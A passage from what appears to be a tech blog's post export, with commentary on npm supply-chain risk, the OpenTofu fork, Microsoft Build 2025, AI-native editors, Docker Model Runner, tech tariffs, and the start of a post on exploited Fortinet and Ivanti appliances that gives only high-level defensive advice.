Implementing SLSA frameworks and zero-day awareness helps shift the balance, and organizations deploying AI systems must consider these supply chain risks as part of EU AI Act compliance.\nI don\u0026rsquo;t think the answer is a closed registry or mandatory code review for every package — that would kill the innovation that makes the JavaScript ecosystem vibrant. But I do think we need better defaults. Disabling install scripts by default. Requiring provenance attestations for packages above a certain download threshold. Making dependency review a first-class part of the development workflow rather than an afterthought.\nThe JavaScript community has solved harder problems than this. But it requires acknowledging that the current state of affairs — where any developer can accidentally install malware by mistyping a package name — is not acceptable for an ecosystem that powers a significant portion of the world\u0026rsquo;s web infrastructure.\nLock your dependencies. Audit your packages. Stay vigilant. And maybe, just maybe, write that utility function yourself.\n","date":"5 June 2025","externalUrl":null,"permalink":"/posts/250605-npm-supply-chain-security-lessons/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Another wave of malicious npm packages reminds us that JavaScript’s dependency ecosystem remains one of software’s biggest security challenges.","title":"NPM Supply Chain Attacks — The Problem That Won't Go Away","type":"posts"},{"content":"When HashiCorp switched Terraform\u0026rsquo;s license from MPL to BSL in August 2023, the infrastructure-as-code community erupted. Within weeks, the OpenTofu project was announced under the Linux Foundation, promising to maintain a truly open-source alternative. This parallels broader cloud platform and DevOps evolution trends. 
Nearly two years in, I think it\u0026rsquo;s time to take an honest look at how that fork is going — because the answer is more nuanced than either cheerleaders or skeptics predicted.\nThe State of OpenTofu in Mid-2025 # OpenTofu has shipped several significant releases since its 1.6 GA launch in January 2024. The project has established a steady release cadence, an active contributor community, and — critically — broad support from the ecosystem of providers and modules that make Terraform/OpenTofu actually useful.\nThe headline feature that\u0026rsquo;s gotten the most attention is state encryption, which was one of the first major divergences from upstream Terraform. This is a genuine improvement — storing infrastructure state in plaintext has always been a security concern that the community complained about for years. OpenTofu tackled it head-on, and the implementation is solid. Client-side encryption of state files with support for multiple key providers (AWS KMS, GCP KMS, OpenBao) addresses a real pain point.\nOther additions include improved variable validation, early support for for_each on provider configurations, and various performance improvements to the planning engine. None of these are revolutionary on their own, but together they signal a project that\u0026rsquo;s doing the unglamorous work of improving developer experience incrementally.\nProvider Ecosystem Health # This was always going to be the make-or-break question for OpenTofu. Terraform\u0026rsquo;s value was never just the core engine — it was the vast ecosystem of providers that let you manage everything from AWS VPCs to Datadog monitors. If providers didn\u0026rsquo;t work with OpenTofu, the fork would be dead on arrival.\nThe good news: compatibility has been remarkably high. The major cloud providers (AWS, Azure, GCP) work without issues. Most community providers have adopted dual compatibility. 
The OpenTofu registry is growing, and the team has done a good job of maintaining backward compatibility with Terraform configurations.\nThe nuance: some HashiCorp-authored providers are starting to diverge in ways that create friction. Nothing breaking yet, but the gap is widening. Teams considering a migration need to test their specific provider configurations rather than assuming everything will \u0026ldquo;just work.\u0026rdquo; I\u0026rsquo;ve been advising teams to set up parallel planning runs during migration — run both terraform plan and tofu plan and diff the outputs before committing. This approach aligns well with container-based infrastructure strategies using tools like Docker for reproducible deployment pipelines, while supply chain security and cloud cost implications should also factor into migration decisions.\nWho\u0026rsquo;s Actually Migrating? # In my conversations with DevOps teams across Europe, the migration pattern is interesting. New projects are increasingly starting with OpenTofu — the license clarity makes procurement and legal conversations much simpler, especially in organizations that have policies about BSL-licensed software. For greenfield work, there\u0026rsquo;s really no downside.\nExisting Terraform users are more cautious, and reasonably so. Migration is technically straightforward (swap the binary, update CI configurations), but the organizational change management is non-trivial. Teams need to update documentation, retrain muscle memory on CLI differences, and — most importantly — decide whether to pin to OpenTofu or maintain the option to switch back.\nThe enterprises I\u0026rsquo;ve seen commit to OpenTofu tend to have strong opinions about open-source licensing and/or have been burned by vendor lock-in before. The ones staying with Terraform tend to be HashiCorp customers who value the commercial support and Terraform Cloud integration. 
Both are rational choices.\nThe Broader IaC Landscape # OpenTofu\u0026rsquo;s emergence has energized the broader infrastructure-as-code space in unexpected ways. Pulumi continues to gain traction with its programming-language-first approach — writing infrastructure in Python, TypeScript, or Go rather than HCL appeals to developers who\u0026rsquo;d rather not learn another DSL. AWS CDK occupies a similar space for AWS-only shops.\nThen there\u0026rsquo;s the new generation of tools like System Initiative that are rethinking infrastructure management from scratch, with collaborative visual interfaces and reactive change engines. It\u0026rsquo;s early days, but the innovation in this space is encouraging.\nWhat I find most healthy about the current landscape is that teams actually have choices now. Two years ago, if you wanted declarative multi-cloud infrastructure management, Terraform was essentially the only game in town. Today, you have OpenTofu for the open-source path, Terraform for the commercial path, Pulumi for the programming-language path, and emerging alternatives for teams willing to be on the cutting edge.\nMy Take # OpenTofu has exceeded my expectations. I wasn\u0026rsquo;t sure a community fork could maintain the velocity and quality needed to be a credible Terraform alternative, but the project has proven it can. The governance is transparent, the release quality has been high, and the contributor base is diverse enough to be sustainable.\nThat said, I worry about the long-term divergence challenge. As OpenTofu and Terraform evolve independently, the \u0026ldquo;easy migration\u0026rdquo; story will eventually break down. Teams will need to commit to one or the other, and that commitment gets harder to reverse over time. 
If you\u0026rsquo;re making this decision now, think carefully about your organization\u0026rsquo;s values around open-source licensing, your need for commercial support, and your tolerance for ecosystem risk.\nFor what it\u0026rsquo;s worth, my personal infrastructure projects have all moved to OpenTofu. The state encryption alone was worth the switch, and I sleep better knowing my tooling can\u0026rsquo;t have its license changed out from under me. But I\u0026rsquo;m not dogmatic about it — the right choice depends on your context. As organizations focus on cost optimization and engineering ownership, tooling that isn\u0026rsquo;t vendor-locked becomes increasingly valuable.\nThe Terraform fork was a test of whether the open-source community could effectively respond to a licensing change by a major vendor. So far, the answer is a cautious but genuine yes.\n","date":"29 May 2025","externalUrl":null,"permalink":"/posts/250529-opentofu-terraform-fork-maturing/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"A year and a half after forking from Terraform, OpenTofu is proving that community-driven infrastructure tooling can thrive — but challenges remain.","title":"OpenTofu at One — How the Terraform Fork Found Its Footing","type":"posts"},{"content":"Another May, another Microsoft Build. I\u0026rsquo;ve been watching these keynotes for longer than I care to admit, and this year\u0026rsquo;s event in Seattle felt like the moment Microsoft\u0026rsquo;s AI strategy finally cohered into something you can evaluate as an engineering platform rather than a collection of impressive demos. 
The message was unmistakable: Microsoft wants Azure to be the place where AI applications get built, deployed, and managed — and they\u0026rsquo;re building the toolchain to make that argument compelling.\nThe Copilot Stack Matures # The centerpiece of this year\u0026rsquo;s announcements was the evolution of what Microsoft calls the \u0026ldquo;Copilot Stack.\u0026rdquo; Rather than positioning Copilot as a single product, they\u0026rsquo;re now framing it as a layered platform that developers can build on. At the bottom: Azure AI infrastructure with the latest model hosting capabilities. In the middle: orchestration services for building agent-based applications. At the top: Copilot experiences embedded across Microsoft 365, Windows, and third-party applications.\nWhat caught my attention was the Azure AI Foundry updates. The model catalog now includes not just OpenAI\u0026rsquo;s models but a growing roster of open-source alternatives — Llama, Mistral, Phi — all deployable with consistent APIs and monitoring. For teams that want to avoid vendor lock-in on the model layer while still getting enterprise-grade infrastructure, this is genuinely useful. Interestingly, this multi-model approach mirrors how foundation model capabilities are evolving across the industry.\nThe new agent orchestration framework is perhaps the most ambitious piece. Microsoft is betting that the next wave of AI applications won\u0026rsquo;t be chatbots — they\u0026rsquo;ll be autonomous agents that can plan, execute multi-step workflows, and coordinate with each other. The tooling they showed for building, testing, and monitoring these agents is still early, but the direction is clear.\nGitHub Copilot Goes Agentic # The GitHub announcements at Build deserve their own section. Copilot Workspace — the feature that lets you go from issue to pull request with AI assistance — is getting significant upgrades. 
The new version can handle more complex, multi-file changes and includes better planning capabilities that show you what it intends to do before it does it.\nMore interesting to me was the deeper integration between GitHub Copilot and Azure DevOps pipelines. The vision they\u0026rsquo;re painting is one where AI assists not just in writing code but in reviewing it, deploying it, and monitoring it in production. This approach echoes the broader trend of AI-native integrated development environments that are redefining the developer experience. Whether you find that exciting or terrifying probably says something about your relationship with automation.\nI\u0026rsquo;ll admit I was skeptical about \u0026ldquo;agentic\u0026rdquo; coding when the term first started circulating. But after watching the demos — and more importantly, after talking to teams who are using early versions in production — I\u0026rsquo;m coming around. The key insight is that these agents work best not as autonomous coders but as highly capable assistants that handle the routine parts of software development while humans focus on architecture and design decisions.\n.NET and Developer Tooling # Buried under the AI headlines were some solid developer tooling updates. .NET 10 previews showed continued performance improvements and better cloud-native support. The new Aspire dashboard for distributed application development looks genuinely useful — finally, a sane way to manage the constellation of services that modern .NET applications depend on.\nVisual Studio and VS Code both got updates focused on — you guessed it — AI integration. But the more practical improvements were around debugging distributed systems and profiling cloud-deployed applications. These are the kinds of features that don\u0026rsquo;t make keynote highlights but save developers hours of frustration in their daily work.\nMAUI, Microsoft\u0026rsquo;s cross-platform UI framework, continues its slow march toward maturity. 
I remain cautiously optimistic here — the idea of sharing UI code across platforms is appealing, but the execution has been inconsistent. The performance improvements they showed were encouraging, though I\u0026rsquo;d want to see them validated in production scenarios.\nThe Competitive Landscape # What makes Build 2025 interesting is the competitive context. Google I/O happened the same week, and AWS re:Invent is only months away. Each cloud provider is making its version of the same argument: \u0026ldquo;build your AI applications here.\u0026rdquo; Microsoft\u0026rsquo;s advantage is the integration story — Azure to GitHub to VS Code to Microsoft 365 is a remarkably complete pipeline if you buy into the ecosystem.\nThe risk for Microsoft is the same as it\u0026rsquo;s always been: complexity. The Azure portal already feels overwhelming for newcomers, and adding layers of AI services doesn\u0026rsquo;t simplify things. The teams I talk to who are most successful with Azure are the ones with dedicated platform engineers who can navigate the maze. That\u0026rsquo;s not a great story for the startup or mid-size company that just wants to deploy an AI feature.\nGoogle\u0026rsquo;s counter-argument is simplicity and model quality. AWS\u0026rsquo;s counter-argument is flexibility and existing market share. The next twelve months will be fascinating to watch.\nMy Take # Microsoft is doing something genuinely impressive at the platform level. The integration between Azure, GitHub, and the developer toolchain is deeper and more thoughtful than anything the competition offers. If I were starting a new enterprise project today and my team was already in the Microsoft ecosystem, the argument for going all-in on the Copilot Stack would be strong — especially if navigating AI governance and compliance requirements is a priority.\nBut I keep coming back to a fundamental concern: are we building applications that depend on AI capabilities we don\u0026rsquo;t fully understand? 
The agent orchestration demos were slick, but the failure modes of autonomous AI agents in production are still poorly characterized. I\u0026rsquo;d love to see Microsoft invest as heavily in observability and safety tooling for AI agents as they are in the agents themselves.\nBuild 2025 showed us where enterprise software development is heading. Whether we\u0026rsquo;re ready for that destination is a different question entirely.\n","date":"22 May 2025","externalUrl":null,"permalink":"/posts/250522-microsoft-build-2025-ai-platform/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Build 2025 revealed Microsoft’s strategy to make Azure the default platform for AI development — from model hosting to agent orchestration.","title":"Microsoft Build 2025 — The AI Platform Play Comes Into Focus","type":"posts"},{"content":"The code editor landscape hasn\u0026rsquo;t seen this much disruption since VS Code dethroned Sublime Text and Atom nearly a decade ago. But the latest wave of challengers isn\u0026rsquo;t competing on speed, themes, or plugin ecosystems — they\u0026rsquo;re competing on how deeply AI is woven into the editing experience itself. This evolution from the early days of GitHub Copilot through modern AI-native editors represents a fundamental shift in how developers interact with code.\nFrom Autocomplete to Co-Pilot to Co-Author # The progression has been remarkably fast. GitHub Copilot launched in 2021 as a fancy autocomplete tool — impressive, occasionally wrong, but fundamentally an add-on. You were still driving. Then came the \u0026ldquo;chat in sidebar\u0026rdquo; phase — Copilot Chat, Codeium\u0026rsquo;s assistant panel, Amazon CodeWhisperer\u0026rsquo;s suggestions. Useful, but bolted on.\nWhat Cursor and similar AI-native editors are doing is different. The AI isn\u0026rsquo;t a feature; it\u0026rsquo;s the architecture. Tab-completion that understands your entire codebase. 
Inline editing that rewrites functions based on natural language instructions. Multi-file refactoring that actually works across module boundaries. This architectural shift aligns with the AI platform strategies that major vendors are pursuing, embedding AI at the foundational level.\nI\u0026rsquo;ve been writing code professionally for three decades, and I can tell you: the gap between \u0026ldquo;AI-assisted editing\u0026rdquo; and \u0026ldquo;AI-native editing\u0026rdquo; feels similar to the gap between editing code in Notepad versus using a proper IDE. Once you\u0026rsquo;ve experienced the latter, going back feels painful.\nThe Cursor Phenomenon # Cursor has been the breakout story. Built as a fork of VS Code — which means all your extensions and keybindings carry over — it layers AI capabilities at a fundamental level. The \u0026ldquo;Composer\u0026rdquo; feature lets you describe changes across multiple files and watch them materialize. The codebase indexing means the AI actually understands your project structure, not just the file you have open.\nWhat\u0026rsquo;s struck me most is the adoption pattern. This isn\u0026rsquo;t just enthusiasts and early adopters anymore. I\u0026rsquo;m seeing it in enterprise teams, in agencies, in the kind of shops that were running Eclipse five years ago. When developers with 15+ years of experience tell me they can\u0026rsquo;t go back to a non-AI editor, that\u0026rsquo;s a signal worth paying attention to.\nWindsurf (formerly Codeium\u0026rsquo;s editor play) is taking a similar approach but with a different philosophy around \u0026ldquo;Flows\u0026rdquo; — longer-form AI interactions that maintain context across a development session. It\u0026rsquo;s more opinionated about workflow, which some developers love and others find constraining.\nWhat This Means for VS Code and JetBrains # The incumbents aren\u0026rsquo;t standing still. 
VS Code\u0026rsquo;s Copilot integration keeps getting deeper — inline chat, workspace-aware suggestions, the recently improved agent mode. JetBrains has been rolling out their AI Assistant across the IntelliJ platform. But there\u0026rsquo;s a structural challenge: when AI is a retrofit rather than a foundation, there are limits to how deeply it can integrate.\nThat said, I wouldn\u0026rsquo;t count Microsoft out. They own both VS Code and GitHub Copilot, and the resources they can throw at this problem are enormous. The question is whether organizational complexity slows them down enough for the startups to establish defensible positions.\nJetBrains is in a more interesting spot. Their editors have always been opinionated and deeply integrated — the \u0026ldquo;it just works\u0026rdquo; philosophy that Java and Kotlin developers swear by. If anyone can make AI feel native in an existing editor, it\u0026rsquo;s them. But the early returns suggest they\u0026rsquo;re playing catch-up.\nThe Productivity Question # Here\u0026rsquo;s the thing everyone wants to know: do AI-native editors actually make you more productive? My honest answer after months of use: yes, but not in the way you might expect.\nThe big wins aren\u0026rsquo;t in writing code faster. They\u0026rsquo;re in reducing the friction of unfamiliar codebases, automating tedious refactoring, and — perhaps most importantly — lowering the activation energy for tasks you\u0026rsquo;d otherwise procrastinate on. That test file you should write? Much easier when you can describe what it should cover and have a solid first draft appear. That API integration you\u0026rsquo;ve been putting off? Describing the data flow and watching the boilerplate materialize removes the \u0026ldquo;ugh\u0026rdquo; factor.\nThe risk, of course, is over-reliance. I\u0026rsquo;ve caught myself accepting AI-generated code without the scrutiny I\u0026rsquo;d apply to my own work. 
Code review skills become even more critical when a significant portion of the code was machine-generated. And there\u0026rsquo;s a real concern about junior developers who learn to prompt before they learn to program — an issue compounded by the rapid evolution of language model capabilities that leave traditional programming education perpetually behind.\nMy Take # We\u0026rsquo;re in the \u0026ldquo;Cambrian explosion\u0026rdquo; phase of AI-native development tools. A year from now, the landscape will look very different — some of these tools will have consolidated, others will have found niches, and the incumbents will have closed some of the gap. But the fundamental shift toward AI-native editing environments feels irreversible.\nMy advice to fellow developers: try at least one AI-native editor for a real project, not just a toy example. Give it two weeks. You\u0026rsquo;ll either be converted or you\u0026rsquo;ll have a much more informed opinion about what these tools actually offer versus what the hype suggests.\nThe editor wars never really end — they just find new dimensions to fight over. This time, the dimension is intelligence.\n","date":"15 May 2025","externalUrl":null,"permalink":"/posts/250515-ai-native-ides-cursor-copilot/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Cursor, Windsurf, and the growing wave of AI-native editors are reshaping how developers write code — and challenging the incumbents.","title":"AI-Native IDEs — The Editor Wars Have a New Front","type":"posts"},{"content":"Docker announced Model Runner this week, a new feature in Docker Desktop that lets you pull and run AI models locally using the same familiar workflow you\u0026rsquo;d use for container images. If you\u0026rsquo;ve ever wished you could just docker run a language model the way you spin up a PostgreSQL container, that\u0026rsquo;s essentially what this enables. 
And after spending a couple of days experimenting with it, I think it\u0026rsquo;s a bigger deal than the understated announcement might suggest.\nThe feature is currently in beta as part of Docker Desktop 4.41, and it supports a growing catalog of models from Hugging Face and other registries. You can run models locally using your machine\u0026rsquo;s GPU (or CPU, with corresponding performance trade-offs), and they integrate with Docker\u0026rsquo;s existing networking and volume systems.\nHow It Works # The basic workflow is surprisingly straightforward. Docker has extended its CLI and Desktop UI to support model management as a first-class concept. You can pull models from registries, list available models, and run inference — all through the Docker interface you already know.\nUnder the hood, Docker Model Runner leverages llama.cpp and similar inference engines, packaged and managed by Docker\u0026rsquo;s runtime. The models are stored in Docker\u0026rsquo;s content store alongside your container images, and they benefit from the same layer caching and deduplication mechanisms. If you pull two models that share a base architecture, Docker is smart enough to reuse the common layers.\nWhat makes this different from just running Ollama or llama.cpp directly is the integration story. Docker Model Runner exposes a local API endpoint that\u0026rsquo;s compatible with the OpenAI API format. This means any application code that talks to OpenAI\u0026rsquo;s API can be pointed at your local model runner with just a URL change. For development and testing, this is extremely practical.\nThe Docker Compose integration is where things get really interesting. You can define a model as a service in your docker-compose.yml alongside your application containers, your database, your message queue — everything spins up together. 
Your application connects to the model service over Docker\u0026rsquo;s internal network, just like it would connect to any other service.\nWhy This Matters for Development Workflows # The pain point Docker is addressing here is real. Right now, if you\u0026rsquo;re building an application that uses AI models, your development workflow probably looks something like this: you call an external API (OpenAI, Anthropic, etc.) during development, which means you need API keys and network access, and you pay per request. The shift toward in-context learning makes this even more relevant — when you\u0026rsquo;re experimenting with prompt engineering and context structures, paying per token during development adds up fast. Or you run something like Ollama separately, manage it as a distinct tool, and wire things together manually. With Docker Model Runner, the model instead becomes part of the same reproducible environment as the rest of your stack, in the spirit of what infrastructure-as-code tools like Terraform do for other services.\nDocker Model Runner collapses this into the standard Docker development workflow. Clone a repo, run docker compose up, and you have your entire application stack — including the AI model — running locally. No external API calls, no separate tool management, no API keys needed for basic development.\nFor teams working on AI-powered applications, this addresses several practical problems:\nOffline development: You can work on AI features on a plane, in a coffee shop with bad WiFi, or in an air-gapped environment. The model runs locally, with no network required.\nCost control during development: Every time a developer hits \u0026ldquo;run tests\u0026rdquo; against an external AI API, the meter is ticking. Local models eliminate that cost for development and testing cycles.\nReproducibility: When the model is part of your Docker Compose stack, every developer on the team is running the same model version. 
No more \u0026ldquo;works on my machine\u0026rdquo; issues caused by different API model versions or rate limiting. This mirrors the advantages we\u0026rsquo;ve seen with containerized infrastructure — codified, versioned, reproducible environments. This is especially important when governance requirements like the EU AI Act mandate precise documentation of which models and versions were used.\nPrivacy: For applications handling sensitive data, running inference locally during development means that data never leaves the machine. This is significant for healthcare, finance, and other regulated industries.\nPerformance Reality Check # Let\u0026rsquo;s be honest about the limitations. Running a 7B parameter model on a developer\u0026rsquo;s laptop is not the same as hitting GPT-4o or Claude via API. The model quality is lower, the inference speed depends heavily on your hardware, and the larger models that produce better results require serious GPU memory. For context, the latest large models like Llama 3.1 run much better on server-class hardware, but the smaller models available through Docker Model Runner are optimized for developer machines.\nOn my MacBook Pro with an M3 Max and 64GB of unified memory, I can run 13B parameter models comfortably and get reasonable inference speeds — maybe 15-20 tokens per second. That\u0026rsquo;s workable for development but not great for anything interactive. Smaller 7B models run faster, around 30-40 tokens per second, but with correspondingly lower quality.\nThe sweet spot I\u0026rsquo;ve found is using local models for development and testing of the integration layer — making sure your prompts are structured correctly, your response parsing handles edge cases, and your application logic works — while accepting that the actual model quality will be different in production. Think of it like developing against a local SQLite database when your production runs PostgreSQL. 
The interface is the same, the behavior is close enough for development, but you still need to test against the real thing.\nThe Docker Ecosystem Play # What Docker is really doing here is extending their platform strategy. They\u0026rsquo;ve already won the \u0026ldquo;how developers run local infrastructure\u0026rdquo; battle with Docker Compose. By adding AI models to that same ecosystem, they\u0026rsquo;re ensuring that Docker Desktop remains the central tool in the development workflow even as AI becomes a core component of more applications.\nIt\u0026rsquo;s a smart move. The alternative was that developers would adopt a separate tool for local AI — Ollama, LM Studio, or something similar — and Docker\u0026rsquo;s role would be limited to the non-AI parts of the stack. By integrating model running into Docker itself, they maintain their position as the unified development environment.\nI also expect this to drive model registry standards in interesting directions. Docker has already influenced container image standards through OCI. If they push for similar standardization around model packaging and distribution, that could benefit the entire ecosystem. We\u0026rsquo;ve seen this playbook work before with infrastructure tooling — standardization and open-source alternatives drive innovation and adoption as maturity increases.\nMy Take # Docker Model Runner is one of those features that seems incremental until you actually use it. The moment you add a model service to your Docker Compose file and have your entire AI-powered application stack running with a single command, the developer experience improvement is tangible.\nIs it going to replace cloud-based AI APIs in production? No. Is it going to change how teams develop and test AI-powered applications? I think so, yes. 
The friction reduction is significant, and in my experience, reducing friction in development workflows has an outsized impact on team productivity and code quality.\nIf you\u0026rsquo;re building anything that integrates AI models, I\u0026rsquo;d recommend trying Docker Model Runner in your development stack this week. The setup takes about fifteen minutes, and the workflow improvement is immediate. Just make sure your laptop has enough RAM — those models are hungry.\n","date":"8 May 2025","externalUrl":null,"permalink":"/posts/250508-docker-model-runner-local-ai/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Docker’s new Model Runner feature brings local AI model execution into the Docker Desktop workflow, blurring the line between containers and inference.","title":"Docker Model Runner — Running AI Models Alongside Your Containers","type":"posts"},{"content":"The past few weeks have been a whirlwind in global trade policy, and for the first time in my career, tariff discussions are showing up in engineering planning meetings. The sweeping US tariffs announced in early April — including significant levies on electronics, semiconductors, and computing equipment — are creating real uncertainty for technology companies and the engineers who build their systems.\nI normally don\u0026rsquo;t write about trade policy. But when tariffs start affecting server hardware costs, cloud pricing forecasts, and the availability of development hardware, it becomes an engineering problem. And right now, it\u0026rsquo;s becoming a significant one.\nWhat\u0026rsquo;s Actually Happening # The tariff situation is complex and still evolving. The key points relevant to technology teams:\nThe US has imposed tariffs on a broad range of imported goods, with rates varying significantly by country of origin. 
While smartphones and some consumer electronics received temporary exemptions, server hardware, networking equipment, and many electronic components are subject to tariffs ranging from 10% to over 100% depending on origin. This is part of a longer pattern of supply chain disruptions in technology — the JavaScript ecosystem has dealt with similar supply chain pressures through security challenges.\nChina-manufactured technology products face the steepest tariffs. This is particularly significant because a substantial portion of the world\u0026rsquo;s servers, switches, and storage hardware is manufactured in or has major supply chain dependencies on Chinese factories. Even \u0026ldquo;American\u0026rdquo; hardware companies often rely on Chinese manufacturing for key components or final assembly.\nThe semiconductor situation is nuanced — there\u0026rsquo;s been talk of specific semiconductor tariffs, but the existing CHIPS Act investments and the strategic importance of chip supply have made this politically complicated. What\u0026rsquo;s clear is that the cost of computing hardware is going up, and the timeline for that increase is months, not years.\nImpact on Cloud Infrastructure # For most software teams, the immediate question is: how does this affect cloud costs? The cloud providers — AWS, Azure, and Google Cloud — haven\u0026rsquo;t announced significant price increases yet, but the math is straightforward. If the servers going into data centers cost 15-30% more, that cost gets passed through eventually.\nThe hyperscalers have some buffer here. They negotiate long-term hardware contracts, maintain significant inventory, and have been diversifying their manufacturing supply chains for years (partly in response to earlier rounds of trade tensions). 
AWS, for example, has been building custom Graviton chips fabricated by TSMC in Taiwan, and has been expanding data center construction in regions with more favorable trade positions.\nBut the buffer isn\u0026rsquo;t infinite. If tariffs persist at current levels, I\u0026rsquo;d expect cloud pricing adjustments by Q3 or Q4 of this year. The question is how it manifests — direct price increases on existing instances, or more subtle changes like shifting the pricing tiers to make newer (more cost-efficient) instance types relatively more attractive while quietly retiring cheaper legacy options.\nFor organizations running on-premises or hybrid infrastructure, the impact is more immediate. If you\u0026rsquo;re planning hardware refreshes or data center expansions, your procurement costs just went up significantly. I\u0026rsquo;m already hearing from colleagues that lead times for enterprise server orders are extending as vendors work through the logistics.\nWhat About Development Hardware? # The tariff exemptions for smartphones and laptops are temporary and partial. Developer workstations, high-end GPUs for local ML development, and networking equipment for lab environments are all potentially affected.\nNVIDIA GPUs, which have become essential tools for ML engineering teams, are largely manufactured by partners in Taiwan and China. While NVIDIA designs the chips and TSMC fabricates the silicon, the actual board manufacturing and assembly often happens in China. The tariff implications for GPU pricing are still shaking out, but upward pressure on prices seems inevitable.\nFor teams that rely on local GPU infrastructure for model training or fine-tuning, this could accelerate the move to cloud-based ML platforms. 
The economics might shift to make cloud GPU instances more attractive relative to buying and maintaining your own hardware, even if cloud prices also increase.\nSupply Chain Diversification for Software # There\u0026rsquo;s a broader lesson here for software engineering teams, even those who don\u0026rsquo;t directly purchase hardware. Supply chain risk isn\u0026rsquo;t just about physical components — it extends to the services and infrastructure we depend on.\nConsider your dependencies: Where are your cloud provider\u0026rsquo;s data centers? What happens to your latency and compliance posture if you need to shift regions? Are your critical SaaS tools pricing-stable, or could they pass through hardware cost increases? If you\u0026rsquo;re running edge computing or IoT deployments, how exposed are your device manufacturers to tariff impacts?\nThese aren\u0026rsquo;t questions most software engineers have had to think about before. But the increasing entanglement of technology and trade policy means infrastructure planning now requires awareness of geopolitical risk. This awareness of supply chain vulnerability extends to the need for stronger supply chain security practices across all layers of technology infrastructure. It\u0026rsquo;s uncomfortable, but it\u0026rsquo;s real.\nPlanning for Uncertainty # My practical advice for engineering teams navigating this:\nShort term (next 3 months): Lock in any pending hardware purchases at current prices if you can. Review your cloud committed-use discounts and reserved instances — if you were on the fence about committing, the calculus may have changed. Build cost monitoring dashboards if you don\u0026rsquo;t have them already.\nMedium term (3-12 months): Evaluate workload placement flexibility. Can you run in multiple regions? Can you shift between cloud providers if pricing changes significantly? 
Invest in containerization and infrastructure-as-code that makes portability practical, not just theoretical.\nLong term: Accept that hardware costs are a variable, not a constant. Build cost awareness into your architecture decisions. The era of reliably declining compute costs may be pausing, and that changes the optimization landscape for system design.\nMy Take # I find it somewhat surreal to be writing about tariff policy on a tech blog, but here we are. The technology industry has operated in a globally integrated supply chain for decades, and we\u0026rsquo;ve built our planning assumptions around that reality. Tariffs don\u0026rsquo;t just increase costs — they inject uncertainty, and uncertainty is harder to manage than known cost increases.\nThe silver lining, if there is one, is that this pressure accelerates important engineering practices. Multi-cloud portability, infrastructure automation, cost-aware architecture, and supply chain transparency are all things we should have been investing in anyway. These practices align well with the broader industry shift toward infrastructure-as-code and platform engineering that enables the flexibility needed to navigate economic uncertainty. If tariff uncertainty provides the business case to finally do that work properly, then at least the disruption produces something valuable.\nFor now, keep building, keep monitoring your costs, and keep your deployment pipelines flexible. 
The ground is shifting, and the teams that adapt fastest will have an advantage.\n","date":"1 May 2025","externalUrl":null,"permalink":"/posts/250501-tech-tariffs-software-supply-chain/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"New US tariffs on technology imports are sending ripples through hardware supply chains, cloud pricing, and software infrastructure planning.","title":"Tech Tariffs and the Software Supply Chain — What Engineers Need to Know","type":"posts"},{"content":"If you manage any kind of network infrastructure, the past few weeks have been rough. Multiple actively exploited vulnerabilities in Fortinet FortiGate firewalls and Ivanti Connect Secure VPN appliances have sent security teams scrambling, and CISA has added several of these to their Known Exploited Vulnerabilities catalog. This isn\u0026rsquo;t theoretical risk — these are being used in the wild right now by sophisticated threat actors.\nHaving dealt with my share of emergency patching cycles over three decades, this wave feels particularly concerning. Not because the individual vulnerabilities are unprecedented — we\u0026rsquo;ve seen similar supply chain exploitation nightmares before — but because of what they collectively reveal about the state of perimeter security.\nWhat\u0026rsquo;s Being Exploited # The Fortinet situation involves a series of vulnerabilities that allow attackers to gain and maintain persistent access to FortiGate devices. The most critical is an authentication bypass that allows remote attackers to gain super-admin privileges through crafted requests to the Node.js websocket module. 
What makes this particularly nasty is that attackers have been creating local admin accounts and modifying firewall configurations to establish persistent access — meaning even after you patch, the backdoor might still be there.\nFortinet published advisories and patches, but evidence suggests that threat actors had been exploiting some of these vulnerabilities before patches were available. Several security researchers have documented cases where attackers maintained access for weeks before detection.\nOn the Ivanti side, Connect Secure (formerly Pulse Secure) VPN appliances continue to be targeted. New vulnerabilities have been disclosed that allow unauthenticated remote code execution. Given Ivanti\u0026rsquo;s track record over the past year — this is at least the third major exploit wave targeting their VPN products — many organizations are seriously reconsidering their reliance on these devices.\nThe Perimeter Security Paradox # Here\u0026rsquo;s the fundamental problem: the devices we rely on to secure our network perimeters are themselves some of the most vulnerable components in our infrastructure. Firewalls, VPN concentrators, and edge gateways run complex software stacks with web interfaces, management APIs, and custom protocols. They\u0026rsquo;re accessible from the internet by design. And when they\u0026rsquo;re compromised, attackers get access to everything behind them.\nThis isn\u0026rsquo;t a new observation, but the frequency and severity of these incidents should force a reckoning. The traditional network security model — put a hardened perimeter device at the edge and trust everything behind it — has been failing for years. Zero-trust architecture isn\u0026rsquo;t just a buzzword; it\u0026rsquo;s becoming a survival requirement. 
We see this pattern repeat across attack vectors: supply chain attacks on CI/CD systems exploit similar trust assumptions about infrastructure components.\nThe irony is thick: we keep buying expensive security appliances to protect our networks, and those appliances keep becoming the primary attack vector. At some point, the industry needs to ask whether the perimeter appliance model itself is the problem.\nWhat to Do Right Now # If you\u0026rsquo;re running affected Fortinet or Ivanti devices, here\u0026rsquo;s what I\u0026rsquo;d recommend based on the guidance from CISA and the security research community:\nImmediate actions:\nApply available patches. This should go without saying, but the number of unpatched devices visible on Shodan suggests it needs repeating.\nReview device configurations for unauthorized admin accounts, modified firewall rules, or unexpected VPN tunnels.\nCheck logs for indicators of compromise (IoCs). Both Fortinet and multiple security vendors have published detailed IoC lists.\nIf you find evidence of compromise, assume the device is fully owned. Reset to factory defaults, update firmware, and rebuild the configuration from known-good backups.\nLonger-term considerations:\nImplement network segmentation that doesn\u0026rsquo;t rely solely on perimeter devices. Even if your firewall is compromised, lateral movement should be limited.\nDeploy monitoring that can detect anomalous behavior from infrastructure devices — unusual DNS queries, unexpected outbound connections, configuration changes outside maintenance windows.\nEvaluate whether your VPN architecture could be replaced or supplemented with identity-aware proxy solutions (like BeyondCorp-style access) that reduce the attack surface.\nThe Patch Gap Problem # One pattern that keeps repeating in these incidents is the window between vulnerability disclosure and actual patching. 
